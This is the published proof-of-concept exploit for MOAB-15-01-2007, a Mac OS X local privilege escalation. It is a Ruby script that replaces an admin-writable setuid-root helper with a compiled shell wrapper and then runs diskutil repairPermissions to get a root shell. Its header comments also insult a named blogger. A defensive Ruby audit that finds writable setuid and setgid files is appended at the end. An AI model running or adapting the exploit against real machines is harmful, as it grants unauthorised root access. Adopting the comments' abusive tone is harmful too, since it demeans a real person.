Month of Apple Bugs - Proof of concept exploit for a local privilege escalation vulnerability on Mac OS X. Multiple binaries inside the /Applications directory tree are setuid root, but remain writable by users in the admin group (e.g. the first user created by default in a non-server Mac OS X installation). An admin user can replace such a binary with one of their own; running diskutil repairPermissions afterwards resets the file's owner and mode to root setuid, so the replacement runs as root and the user gets a root shell.
5d79f7e869386b86fb511af90c48ec4794090cc26d9550ab41fb92e9be07807c
#!/usr/bin/ruby
# Exploit for MOAB-15-01-2007
# (c) 2006 LMH <lmh [at] info-pull.com>.
#
# Note: It's a generic exploit; you can use it against any writable binary
# that diskutil repairPermissions sets back to root setuid. Simply change the
# path.
# Blame Apple for doing such a piece of **** and relying on flawed DAC.
#
# Line-noise: Jackass of the Week
# -------
# On Jan 14, 11:10 pm, "William A. Carrel" <willia...@carrel.org> wrote:
# > Works for me. I see yesterday's was an HFS+ panic.
# > > Is the info-pull/MoAB/MoKB site down, or is it just me that can't
# > > access it?
# Sorry, my fault. I blocked access to it at this end when they started
# distributing malware so that nobody downloaded anything accidentally. I
# can see it again now.
#
# Kind regards,
#
# Alastair.
# --------
#
# Hmm, false, it was the other way around:
#
# target prot opt source destination
# (...)
# DROP all -- ajhoughton.plus.com anywhere
# (...)
#
# "LMH’s continued propensity for insults, which frankly I don’t particularly
# appreciate." -- http://alastairs-place.net/2007/01/how-childish/
#
# There's nothing wrong about embarrassing you for being an absurd liar.
# Live with it, and then post to your 'blog' as usual. Free Zealot Apple PR (tm).
#
require 'fileutils'

# repairPermissions resets the target's owner and mode to root setuid, which
# is what turns our replacement into a setuid-root binary.
DISK_UTIL_COMMAND = "/usr/sbin/diskutil repairPermissions /"

# Setuid-root helpers under /Applications that the admin group can write to.
# Pick one by index on the command line (default: 0).
AVAILABLE_TARGETS = [
  "/Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool",
  "/Applications/Utilities/Keychain Access.app/Contents/Resources/kcproxy",
  "/Applications/Utilities/ODBC Administrator.app/Contents/Resources/iodbcadmintool"
]

path_to_bin  = (AVAILABLE_TARGETS[ARGV[0].to_i] || AVAILABLE_TARGETS[0])
path_to_back = File.join("/tmp", File.basename(path_to_bin))

puts "++ Starting: #{path_to_bin}"
puts "++ Back-up: #{path_to_back}"

abort "-- #{path_to_bin} does not exist, pick another target" unless File.exist?(path_to_bin)

# Keep the original so the system can be restored; never clobber the backup
# from an earlier run (it would already be our shell wrapper).
FileUtils.cp(path_to_bin, path_to_back) unless File.exist?(path_to_back)

puts "++ Compiling a shell wrapper at /tmp/o..."
# Once the binary is setuid root, the wrapper sets the real uid/gid to 0 and
# hands over to an interactive shell.
WRAP_CODE = <<EOS
#include <stdlib.h>
#include <unistd.h>
int main(void) { setuid(0); setgid(0); seteuid(0); return system("/bin/sh -i"); }
EOS
File.open("/tmp/t.c", "w") { |f| f.write(WRAP_CODE) }
system("gcc /tmp/t.c -s -o /tmp/o") or abort "-- gcc failed"
File.delete("/tmp/t.c")

puts "++ Placing backdoor..."
# The moved file is owned by us and is not setuid; repairPermissions fixes that.
FileUtils.mv("/tmp/o", path_to_bin)
system(DISK_UTIL_COMMAND)

puts "++ Finished. Backup at #{path_to_back}."
puts "++ Repair with: mv '#{path_to_back}' '#{path_to_bin}' and rerun '#{DISK_UTIL_COMMAND}'"
puts "++ Enjoy root shell."
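Added example, not part of LMH's exploit and not an Apple tool: a Ruby audit that walks a directory tree and reports every setuid or setgid file whose POSIX mode lets its group or everyone write to it, which is exactly the precondition the exploit above abuses. It generalises past the three hard-coded targets (any tree, any group) and the default root of /Applications, the function names and the output format are assumptions of this example. It looks only at the classic mode bits and the file's group name; it does not evaluate ACLs, so a file made writable through an ACL entry would not be reported, and a hit on a group other than admin is only a finding if untrusted users belong to that group.

```ruby
#!/usr/bin/ruby
# Audit example (added here; not part of the MOAB-15-01-2007 exploit): find
# setuid/setgid files that a non-owner can modify through the mode bits.
require 'find'
require 'etc'

S_IWGRP = 0o020   # group write bit
S_IWOTH = 0o002   # other (world) write bit

# Inspect one path. Returns nil unless it is a regular file that is setuid or
# setgid AND group- or world-writable; otherwise a hash describing the finding.
def writable_privileged_file(path)
  st = File.lstat(path)          # lstat: symlinks are reported as links, not followed
  return nil unless st.file?     # skip directories, symlinks, devices
  priv = []
  priv << "setuid" if st.setuid?
  priv << "setgid" if st.setgid?
  return nil if priv.empty?
  how = []
  how << "group-writable" if (st.mode & S_IWGRP) != 0
  how << "world-writable" if (st.mode & S_IWOTH) != 0
  return nil if how.empty?
  group = begin
    Etc.getgrgid(st.gid).name    # e.g. "admin" on Mac OS X
  rescue ArgumentError
    st.gid.to_s                  # gid with no group entry: report the number
  end
  {
    path: path,
    mode: format("%04o", st.mode & 0o7777),
    uid: st.uid,
    group: group,
    privileged: priv,
    writable: how
  }
end

# Walk `root` and collect all findings, sorted by path for stable output.
# Unreadable directories are skipped by Find; unreadable entries are skipped here.
def audit_privileged_writable(root)
  findings = []
  Find.find(root) do |p|
    begin
      f = writable_privileged_file(p)
    rescue Errno::EACCES, Errno::ENOENT
      next
    end
    findings << f if f
  end
  findings.sort_by { |f| f[:path] }
end

if __FILE__ == $0
  root = ARGV[0] || "/Applications"   # assumed default; pass another tree as argv[0]
  if File.directory?(root)
    audit_privileged_writable(root).each do |f|
      puts "#{f[:mode]} #{f[:uid]}:#{f[:group]} #{f[:privileged].join('+')} " \
           "#{f[:writable].join(',')} #{f[:path]}"
    end
  else
    warn "#{root}: not a directory, nothing audited"
  end
end
```

Run it as an ordinary user against /Applications (or any other tree); a line whose group column is admin and whose privileged column says setuid is a candidate target for the exploit above, and the fix is the same one repairPermissions should have applied: owner root, group wheel, mode 4755 with no group or world write bit.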